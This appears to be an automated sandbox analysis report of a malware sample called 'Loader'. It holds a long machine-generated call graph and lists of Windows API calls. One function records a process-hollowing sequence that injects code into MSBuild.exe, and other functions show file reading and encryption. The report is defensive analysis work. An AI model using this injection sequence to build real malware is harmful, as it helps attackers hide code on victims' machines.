20628->20635 20630 92dbd8 20630->20593 20632 939430 _Fputc 20631->20632 20682 9395fe 20632->20682 20634 939445 _Fputc 20634->20593 20636 938e94 _Fputc 20635->20636 20639 939023 20636->20639 20638 938ea3 _Fputc 20638->20630 20640 93902f ___scrt_is_nonwritable_in_current_image 20639->20640 20641 939036 20640->20641 20642 93905b 20640->20642 20680 938068 29 API calls 2 library calls 20641->20680 20650 933405 EnterCriticalSection 20642->20650 20645 939051 20645->20638 20646 93906a 20651 938eb7 20646->20651 20650->20646 20652 938eee 20651->20652 20653 938edc 20651->20653 20655 93f7f4 _Fputc 29 API calls 20652->20655 20654 938fef _Fputc 66 API calls 20653->20654 20656 938ee6 20654->20656 20657 938ef5 20655->20657 20659 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20656->20659 20658 93f7f4 _Fputc 29 API calls 20657->20658 20663 938f1d 20657->20663 20660 938f06 20658->20660 20661 938fed 20659->20661 20660->20663 20665 93f7f4 _Fputc 29 API calls 20660->20665 20681 9390ab LeaveCriticalSection __fread_nolock 20661->20681 20662 938fd3 20664 938fef _Fputc 66 API calls 20662->20664 20663->20662 20666 93f7f4 _Fputc 29 API calls 20663->20666 20664->20656 20667 938f12 20665->20667 20668 938f50 20666->20668 20669 93f7f4 _Fputc 29 API calls 20667->20669 20671 93f7f4 _Fputc 29 API calls 20668->20671 20678 938f73 20668->20678 20669->20663 20670 938f8b 20672 93f520 _Fputc 41 API calls 20670->20672 20673 938f5c 20671->20673 20679 938f9d 20672->20679 20674 93f7f4 _Fputc 29 API calls 20673->20674 20673->20678 20675 938f68 20674->20675 20676 93f7f4 _Fputc 29 API calls 20675->20676 20676->20678 20677 938d20 _Fputc 66 API calls 20677->20679 20678->20662 20678->20670 20679->20656 20679->20677 20680->20645 20681->20645 20683 939634 20682->20683 20684 93960c 20682->20684 20683->20634 20684->20683 20685 93963b 20684->20685 20686 939619 20684->20686 20690 9396c1 20685->20690 20698 938068 29 API calls 2 library calls 20686->20698 20691 9396cd ___scrt_is_nonwritable_in_current_image 20690->20691 20699 933405 EnterCriticalSection 20691->20699 20693 9396db 20700 939675 20693->20700 20697 939673 20697->20634 20698->20683 20699->20693 20701 93e77b 30 API calls 20700->20701 20702 93968d 20701->20702 20703 939457 66 API calls 20702->20703 20704 9396ab 20703->20704 20705 93e864 64 API calls 20704->20705 20706 9396b7 20705->20706 20707 939710 LeaveCriticalSection __fread_nolock 20706->20707 20707->20697 20708->20595 20709->20602 20710->20602 20711->20602 20713 924cef 20712->20713 20715 922df0 39 API calls 20713->20715 20716 924d0f 20713->20716 20715->20716 20719 924dde 20716->20719 20723 9230a0 38 API calls std::ios_base::_Init 20716->20723 20724 923460 30 API calls 5 library calls 20716->20724 20725 9306fc RaiseException 20716->20725 20718 921e94 20718->20563 20719->20718 20722 923a80 39 API calls 2 library calls 20719->20722 20722->20718 20723->20716 20724->20716 20725->20716 20727 92294e 20726->20727 20728 922df0 39 API calls 20727->20728 20730 92299a 20727->20730 20736 922971 20727->20736 20728->20730 20730->20736 20746 92d0a0 20730->20746 20731 921028 20738 921110 20731->20738 20732 922b7e 20732->20731 20750 923a80 39 API calls 2 library calls 20732->20750 20736->20732 20751 9230a0 38 API calls std::ios_base::_Init 20736->20751 20752 923460 30 API calls 5 library calls 20736->20752 20753 9306fc RaiseException 20736->20753 20739 92115c 20738->20739 20754 923e10 20739->20754 20744 922df0 39 API calls 20745 921031 20744->20745 20745->20446 20747 92d0c2 _Yarn 20746->20747 20749 92d0af 20746->20749 20748 93941d 69 API calls 20747->20748 20747->20749 20748->20749 20749->20736 20750->20731 20751->20736 20752->20736 20753->20736 20755 92ab94 std::_Lockit::_Lockit 7 API calls 20754->20755 20756 923e4a 20755->20756 20757 92ab94 std::_Lockit::_Lockit 7 API calls 20756->20757 20760 923e85 20756->20760 20759 923e64 20757->20759 20758 923f4f 20761 92abc5 std::_Lockit::~_Lockit 2 API calls 20758->20761 20764 92abc5 std::_Lockit::~_Lockit 2 API calls 20759->20764 20760->20758 20762 92a803 codecvt 3 API calls 20760->20762 20763 921170 20761->20763 20765 923eea 20762->20765 20773 923ba0 20763->20773 20764->20760 20787 924030 67 API calls 4 library calls 20765->20787 20767 923f1c 20788 92edaf 39 API calls __Getctype 20767->20788 20769 923f37 20789 9241b0 65 API calls 3 library calls 20769->20789 20771 923f42 20790 92ace3 RaiseException _Yarn Concurrency::cancel_current_task 20771->20790 20774 923bdf 20773->20774 20776 922df0 39 API calls 20774->20776 20777 923c25 20774->20777 20778 923bff 20774->20778 20776->20777 20777->20778 20791 92cc12 20777->20791 20803 92cc22 20777->20803 20816 92cc30 20777->20816 20781 923ccd 20778->20781 20826 9230a0 38 API calls std::ios_base::_Init 20778->20826 20827 923460 30 API calls 5 library calls 20778->20827 20828 9306fc RaiseException 20778->20828 20780 9211e4 20780->20744 20781->20780 20825 923a80 39 API calls 2 library calls 20781->20825 20787->20767 20788->20769 20789->20771 20790->20758 20792 92cc19 20791->20792 20799 92cc65 20791->20799 20832 933405 EnterCriticalSection 20792->20832 20794 92cc1e 20794->20778 20795 92cc69 20796 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20795->20796 20797 92cd38 20796->20797 20797->20778 20799->20795 20800 92ccf9 20799->20800 20801 92cc99 20799->20801 20800->20795 20802 93941d 69 API calls 20800->20802 20801->20795 20829 92c53d 20801->20829 20802->20795 20804 92cc29 20803->20804 20808 92cc75 20803->20808 20869 933419 LeaveCriticalSection 20804->20869 20806 92cc00 20806->20778 20807 92cc2e 20807->20778 20808->20778 20808->20806 20809 92ccf9 20808->20809 20811 92ccda 20808->20811 20810 93941d 69 API calls 20809->20810 20812 92cceb 20809->20812 20810->20812 20811->20812 20813 92c53d _Fputc 68 API calls 20811->20813 20814 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20812->20814 20813->20812 20815 92cd38 20814->20815 20815->20778 20817 92cc53 20816->20817 20820 92cc4c 20816->20820 20817->20820 20822 92ccf9 20817->20822 20823 92cc99 20817->20823 20818 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20819 92cd38 20818->20819 20819->20778 20820->20818 20821 92c53d _Fputc 68 API calls 20821->20820 20822->20820 20824 93941d 69 API calls 20822->20824 20823->20820 20823->20821 20824->20820 20825->20780 20826->20778 20827->20778 20828->20778 20833 938cec 20829->20833 20831 92c54d 20831->20795 20832->20794 20834 938cff _Fputc 20833->20834 20837 938d4d 20834->20837 20836 938d0e _Fputc 20836->20831 20838 938d59 ___scrt_is_nonwritable_in_current_image 20837->20838 20839 938d62 20838->20839 20840 938d86 20838->20840 20859 938068 29 API calls 2 library calls 20839->20859 20853 933405 EnterCriticalSection 20840->20853 20843 938d8f 20844 938da4 20843->20844 20860 93f7f4 20843->20860 20846 938e41 20844->20846 20847 938e10 20844->20847 20854 938d20 20846->20854 20867 938068 29 API calls 2 library calls 20847->20867 20850 938e4d 20868 938e79 LeaveCriticalSection __fread_nolock 20850->20868 20852 938d7b _Fputc 20852->20836 20853->20843 20855 938d3f 20854->20855 20856 938d2e 20854->20856 20855->20850 20857 944b27 _Fputc 66 API calls 20856->20857 20858 938d3a 20857->20858 20858->20850 20859->20852 20861 93f800 20860->20861 20862 93f815 20860->20862 20863 9377d4 __Wcrtomb 14 API calls 20861->20863 20862->20844 20864 93f805 20863->20864 20865 937ebf __strnicoll 29 API calls 20864->20865 20866 93f810 20865->20866 20866->20844 20867->20852 20868->20852 20869->20807 20870->20453 20871 921680 20882 921ef0 20871->20882 20873 9217b2 _Ref_count_obj 20874 9244c0 30 API calls 20879 92168b 20874->20879 20875 92178d 20875->20873 20888 937ecf 29 API calls 2 library calls 20875->20888 20877 921800 103 API calls 20877->20879 20879->20874 20879->20875 20879->20877 20881 921dc0 75 API calls 20879->20881 20881->20879 20883 921f13 _Fputc 20882->20883 20889 933648 20883->20889 20885 921f2c 20886 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20885->20886 20887 921f3c 20886->20887 20887->20879 20890 93365c _Fputc 20889->20890 20891 93367e 20890->20891 20893 9336a5 20890->20893 20904 938068 29 API calls 2 library calls 20891->20904 20896 934dfd 20893->20896 20895 933699 _Fputc 20895->20885 20897 934e09 ___scrt_is_nonwritable_in_current_image 20896->20897 20905 933405 EnterCriticalSection 20897->20905 20899 934e17 20906 9347d2 20899->20906 20903 934e35 20903->20895 20904->20895 20905->20899 20918 93e77b 20906->20918 20908 9347f9 20925 933c21 20908->20925 20915 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20916 93486c 20915->20916 20917 934e4c LeaveCriticalSection __fread_nolock 20916->20917 20917->20903 20948 93e826 20918->20948 20920 93e7ee 20920->20908 20921 93e78c _Fputc 20921->20920 20956 93c001 20921->20956 20924 93bfc7 ___free_lconv_mon 14 API calls 20924->20920 20977 933b83 20925->20977 20928 933c47 20983 938068 29 API calls 2 library calls 20928->20983 20930 933c64 20941 933951 20930->20941 20935 933ae2 66 API calls 20936 933c6f std::_Locinfo::_Locinfo_dtor 20935->20936 20936->20930 20936->20935 20937 933e63 20936->20937 20984 933880 39 API calls _Fputc 20936->20984 20985 933ed1 29 API calls 20936->20985 20986 933f49 70 API calls 2 library calls 20936->20986 20987 9340a2 70 API calls 2 library calls 20936->20987 20988 938068 29 API calls 2 library calls 20937->20988 20939 933e7d 20989 938068 29 API calls 2 library calls 20939->20989 20942 93bfc7 ___free_lconv_mon 14 API calls 20941->20942 20943 933961 20942->20943 20944 93e864 20943->20944 20945 93485a 20944->20945 20946 93e86f 20944->20946 20945->20915 20946->20945 20992 9386a8 20946->20992 20950 93e832 _Fputc 20948->20950 20949 93e860 20949->20921 20950->20949 20951 93e85c 20950->20951 20952 93f7f4 _Fputc 29 API calls 20950->20952 20951->20921 20953 93e84d 20952->20953 20963 94753f 20953->20963 20955 93e853 20955->20921 20957 93c03f 20956->20957 20961 93c00f __Wcrtomb 20956->20961 20976 9377d4 14 API calls __Wcrtomb 20957->20976 20958 93c02a RtlAllocateHeap 20960 93c03d 20958->20960 20958->20961 20960->20924 20961->20957 20961->20958 20975 935967 EnterCriticalSection LeaveCriticalSection codecvt 20961->20975 20964 94754c 20963->20964 20965 947559 20963->20965 20972 9377d4 14 API calls __Wcrtomb 20964->20972 20968 947565 20965->20968 20973 9377d4 14 API calls __Wcrtomb 20965->20973 20967 947551 20967->20955 20968->20955 20970 947586 20974 937ebf 29 API calls __strnicoll 20970->20974 20972->20967 20973->20970 20974->20967 20975->20961 20976->20960 20978 933bb0 20977->20978 20979 933b8e 20977->20979 20991 9336ec 29 API calls 3 library calls 20978->20991 20990 938068 29 API calls 2 library calls 20979->20990 20982 933ba9 20982->20928 20982->20930 20982->20936 20983->20930 20984->20936 20985->20936 20986->20936 20987->20936 20988->20939 20989->20930 20990->20982 20991->20982 20993 9386c1 20992->20993 20997 9386e8 20992->20997 20994 93f7f4 _Fputc 29 API calls 20993->20994 20993->20997 20995 9386dd 20994->20995 20998 943f00 20995->20998 20997->20945 20999 943f0c ___scrt_is_nonwritable_in_current_image 20998->20999 21000 943f4d 20999->21000 21002 943f93 20999->21002 21008 943f14 20999->21008 21038 938068 29 API calls 2 library calls 21000->21038 21009 943958 EnterCriticalSection 21002->21009 21004 943f99 21005 943fb7 21004->21005 21010 943ce4 21004->21010 21039 944009 LeaveCriticalSection __fread_nolock 21005->21039 21008->20997 21009->21004 21011 943d0c 21010->21011 21037 943d2f __fread_nolock 21010->21037 21012 943d10 21011->21012 21014 943d6b 21011->21014 21054 938068 29 API calls 2 library calls 21012->21054 21015 943d89 21014->21015 21055 942a92 31 API calls __fread_nolock 21014->21055 21040 944011 21015->21040 21019 943da1 21021 943dd0 21019->21021 21022 943da9 21019->21022 21020 943de8 21023 943e51 WriteFile 21020->21023 21024 943dfc 21020->21024 21057 94408e 45 API calls 4 library calls 21021->21057 21022->21037 21056 944455 6 API calls _Fputc 21022->21056 21026 943e73 GetLastError 21023->21026 21035 943de3 21023->21035 21027 943e04 21024->21027 21028 943e3d 21024->21028 21026->21035 21031 943e29 21027->21031 21032 943e09 21027->21032 21047 9444bd 21028->21047 21059 944681 8 API calls 2 library calls 21031->21059 21034 943e12 21032->21034 21032->21037 21058 944598 7 API calls 2 library calls 21034->21058 21035->21037 21037->21005 21038->21008 21039->21008 21041 94753f __fread_nolock 29 API calls 21040->21041 21044 944023 21041->21044 21042 943d9b 21042->21019 21042->21020 21043 944051 21043->21042 21046 94406b GetConsoleMode 21043->21046 21044->21042 21044->21043 21060 933880 39 API calls _Fputc 21044->21060 21046->21042 21048 9444cc _Fputc 21047->21048 21051 94453c WriteFile 21048->21051 21053 94457d 21048->21053 21049 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21050 944596 21049->21050 21050->21037 21051->21048 21052 94457f GetLastError 21051->21052 21052->21053 21053->21049 21054->21037 21055->21015 21056->21037 21057->21035 21058->21037 21059->21035 21060->21043 21061 92b200 21084 92b164 GetModuleHandleExW 21061->21084 21064 92b246 21066 92b164 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21064->21066 21068 92b24c 21066->21068 21067 92b23a 21093 92f0c2 21067->21093 21070 92b26d 21068->21070 21096 92b147 GetModuleHandleExW 21068->21096 21086 927910 21070->21086 21072 92b25d 21072->21070 21073 92b263 FreeLibraryWhenCallbackReturns 21072->21073 21073->21070 21074 92b27d 21075 92b164 Concurrency::details::_Reschedule_chore GetModuleHandleExW 21074->21075 21076 92b283 21075->21076 21077 92b2b1 21076->21077 21097 92b09a 37 API calls std::_Throw_Cpp_error 21076->21097 21079 92b28f 21080 92f0c2 ReleaseSRWLockExclusive 21079->21080 21081 92b2a2 21080->21081 21081->21077 21098 92ea4d WakeAllConditionVariable 21081->21098 21085 92b17a 21084->21085 21085->21064 21092 92b09a 37 API calls std::_Throw_Cpp_error 21085->21092 21087 92794f 21086->21087 21099 928c40 21087->21099 21088 927959 21104 92b104 CloseThreadpoolWork 21088->21104 21090 92796b 21090->21074 21092->21067 21094 92f0cf ReleaseSRWLockExclusive 21093->21094 21095 92f0dd 21093->21095 21094->21095 21095->21064 21096->21072 21097->21079 21098->21077 21100 928c7d 21099->21100 21103 928c88 21100->21103 21105 929290 21100->21105 21121 929280 21100->21121 21103->21088 21104->21090 21138 92f0b1 21105->21138 21108 9292d6 21110 9292e3 21108->21110 21111 92936e 21108->21111 21109 929367 21148 92b47e 30 API calls 2 library calls 21109->21148 21113 929314 21110->21113 21114 9292eb 21110->21114 21149 92b47e 30 API calls 2 library calls 21111->21149 21117 92f0c2 ReleaseSRWLockExclusive 21113->21117 21116 92f0c2 ReleaseSRWLockExclusive 21114->21116 21119 9292f1 std::_Throw_Cpp_error 21116->21119 21118 929321 21117->21118 21141 929490 21118->21141 21119->21103 21122 92928a 21121->21122 21123 92f0b1 12 API calls 21122->21123 21124 9292cb 21123->21124 21125 9292d6 21124->21125 21126 929367 21124->21126 21127 9292e3 21125->21127 21128 92936e 21125->21128 21177 92b47e 30 API calls 2 library calls 21126->21177 21130 929314 21127->21130 21131 9292eb 21127->21131 21178 92b47e 30 API calls 2 library calls 21128->21178 21134 92f0c2 ReleaseSRWLockExclusive 21130->21134 21133 92f0c2 ReleaseSRWLockExclusive 21131->21133 21137 9292f1 std::_Throw_Cpp_error 21133->21137 21135 929321 21134->21135 21136 929490 66 API calls 21135->21136 21136->21137 21137->21103 21150 92f0e1 GetCurrentThreadId 21138->21150 21166 9297c0 21141->21166 21145 92953f 21175 9295a0 66 API calls std::_Throw_Cpp_error 21145->21175 21147 92954e 21147->21119 21151 92f12a 21150->21151 21152 92f10b 21150->21152 21154 92f133 21151->21154 21155 92f14a 21151->21155 21153 92f110 AcquireSRWLockExclusive 21152->21153 21161 92f120 21152->21161 21153->21161 21156 92f13e AcquireSRWLockExclusive 21154->21156 21154->21161 21157 92f1a9 21155->21157 21164 92f162 21155->21164 21156->21161 21159 92f1b0 TryAcquireSRWLockExclusive 21157->21159 21157->21161 21158 92a881 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21160 9292cb 21158->21160 21159->21161 21160->21108 21160->21109 21161->21158 21163 92f199 TryAcquireSRWLockExclusive 21163->21161 21163->21164 21164->21161 21164->21163 21165 92febd GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 21164->21165 21165->21164 21167 929807 21166->21167 21168 92a803 codecvt 3 API calls 21167->21168 21169 9294ff 21168->21169 21170 929690 21169->21170 21171 9296d6 std::_Throw_Cpp_error 21170->21171 21174 9296e0 std::_Throw_Cpp_error 21171->21174 21176 92b66d RaiseException Concurrency::cancel_current_task 21171->21176 21174->21145 21175->21147 21179 9393c7 21180 93bfc7 ___free_lconv_mon 14 API calls 21179->21180 21181 9393df 21180->21181 21182 95a19e 21183 95a1d4 21182->21183 21184 95a321 GetPEB 21183->21184 21185 95a333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 21183->21185 21188 95a3ca TerminateProcess 21183->21188 21184->21185 21185->21183 21186 95a3da WriteProcessMemory 21185->21186 21187 95a41f 21186->21187 21189 95a424 WriteProcessMemory 21187->21189 21190 95a461 WriteProcessMemory Wow64SetThreadContext ResumeThread 21187->21190 21188->21183 21189->21187

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0095A110,0095A100), ref: 0095A334
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0095A347
                                                                                                  • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 0095A365
                                                                                                  • ReadProcessMemory.KERNELBASE(0000009C,?,0095A154,00000004,00000000), ref: 0095A389
                                                                                                  • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 0095A3B4
                                                                                                  • TerminateProcess.KERNELBASE(0000009C,00000000), ref: 0095A3D3
                                                                                                  • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 0095A40C
                                                                                                  • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 0095A457
                                                                                                  • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 0095A495
                                                                                                  • Wow64SetThreadContext.KERNEL32(00000098,029E0000), ref: 0095A4D1
                                                                                                  • ResumeThread.KERNELBASE(00000098), ref: 0095A4E0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                  • API String ID: 2440066154-3857624555
                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                  • Instruction ID: a3ac5f0fc8a2971e50516440e83f973327aa13f762107892372f931766e69240
                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                  • Instruction Fuzzy Hash: 9FB1077260064AAFDB60CF69CC80BDA73A5FF88714F158524EA0CAB341D774FA55CB94

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009225D0
                                                                                                    • Part of subcall function 0092F20D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,009225EA,?,?,00000000), ref: 0092F219
                                                                                                    • Part of subcall function 0092F20D: GetExitCodeThread.KERNEL32(?,00000000,?,?,009225EA,?,?,00000000), ref: 0092F232
                                                                                                    • Part of subcall function 0092F20D: CloseHandle.KERNEL32(?,?,?,009225EA,?,?,00000000), ref: 0092F244
                                                                                                  • CryptEncrypt.ADVAPI32 ref: 00922617
                                                                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 0092261F
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092264B
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092265C
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092266D
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092267E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$CryptThread$CloseCodeCurrentDestroyEncryptExitHandleObjectSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1492798345-0
                                                                                                  • Opcode ID: 3116489f10b0f6f7432583a78ce6bd30eb39b6d3a9c86556dcb257c591b00a81
                                                                                                  • Instruction ID: d0e35dab9c0cafd7b70f405c4b2cb380e661b97833206a27a1db158528c48516
                                                                                                  • Opcode Fuzzy Hash: 3116489f10b0f6f7432583a78ce6bd30eb39b6d3a9c86556dcb257c591b00a81
                                                                                                  • Instruction Fuzzy Hash: 303195F2D40325ABEB10EF90EC06BAEBBF4EB45710F040225E515762C5E3B55A54CBE2

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00921240: _strlen.LIBCMT ref: 009212BA
                                                                                                  • CreateFileA.KERNELBASE ref: 009220E6
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009220F6
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0092211B
                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0092212A
                                                                                                  • _strlen.LIBCMT ref: 0092217D
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009222AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2911764282-0
                                                                                                  • Opcode ID: 802f08166a50a8232cb7fee5218fcfcabd245e4506a0fc69116c34dbaee33872
                                                                                                  • Instruction ID: 93807cb800decb627051531cee7a860eab1433e6fda234c3f92c8cb605f70267
                                                                                                  • Opcode Fuzzy Hash: 802f08166a50a8232cb7fee5218fcfcabd245e4506a0fc69116c34dbaee33872
                                                                                                  • Instruction Fuzzy Hash: CF71B2B2D00225DBCB14DFA4EC45BAEBBB4FF99310F140628E814B7395E735A945CBA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9b9cbaecb5b45e3655f2008dcd3551e2e01a61d6e392fc5691510468157d1c9f
                                                                                                  • Instruction ID: 1fe8d55b243694c9b7f764b1637f66bbe92bd3026174a6867539f3039277a25c
                                                                                                  • Opcode Fuzzy Hash: 9b9cbaecb5b45e3655f2008dcd3551e2e01a61d6e392fc5691510468157d1c9f
                                                                                                  • Instruction Fuzzy Hash: E4215A336502750B879C9F387C62037FB4ADBD66A0705573AED129F2C9E520DE6082E8

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 48 93cffb-93d007 49 93d099-93d09c 48->49 50 93d0a2 49->50 51 93d00c-93d01d 49->51 52 93d0a4-93d0a8 50->52 53 93d02a-93d043 LoadLibraryExW 51->53 54 93d01f-93d022 51->54 57 93d045-93d04e GetLastError 53->57 58 93d0a9-93d0b9 53->58 55 93d0c2-93d0c4 54->55 56 93d028 54->56 55->52 60 93d096 56->60 61 93d050-93d062 call 940644 57->61 62 93d087-93d094 57->62 58->55 59 93d0bb-93d0bc FreeLibrary 58->59 59->55 60->49 61->62 65 93d064-93d076 call 940644 61->65 62->60 65->62 68 93d078-93d085 LoadLibraryExW 65->68 68->58 68->62
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F84A4DD6,?,0093D10A,?,?,00000000), ref: 0093D0BC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
